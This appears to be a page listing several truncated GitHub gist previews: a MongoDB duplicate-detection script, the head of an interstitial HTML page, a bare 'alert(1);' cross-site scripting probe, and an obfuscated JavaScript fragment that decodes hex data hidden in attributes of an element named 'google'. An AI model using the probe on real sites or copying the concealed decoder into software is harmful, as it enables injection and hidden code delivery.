This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
alert(1); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Run this script if the following command fails to clear duplicates | |
// > db.fs.files.ensureIndex( { md5: 1}, {unique: true, dropDups: true} ) | |
// detect duplicates in db.fs.files | |
m = function () { | |
emit(this.md5, 1); | |
} | |
r = function (k, vals) { | |
return Array.sum(vals); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE HTML> | |
<html lang="en-US"> | |
<head> | |
<meta charset="UTF-8" /> | |
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> | |
<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /> | |
<meta name="robots" content="noindex, nofollow" /> | |
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> | |
<title>Just a moment...</title> | |
<style type="text/css"> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
a=document[g]("google"); | |
s=""; | |
for(i=0;;i++){ | |
r=a[gg]("d".concat(i)); // #1 | |
if(r){s=s+r;}else break; | |
} | |
a=s; | |
a=a.replace(/[^0-9a-z]/g,""); | |
s=""; | |
for(i=0;i<a.length;i+=2){ |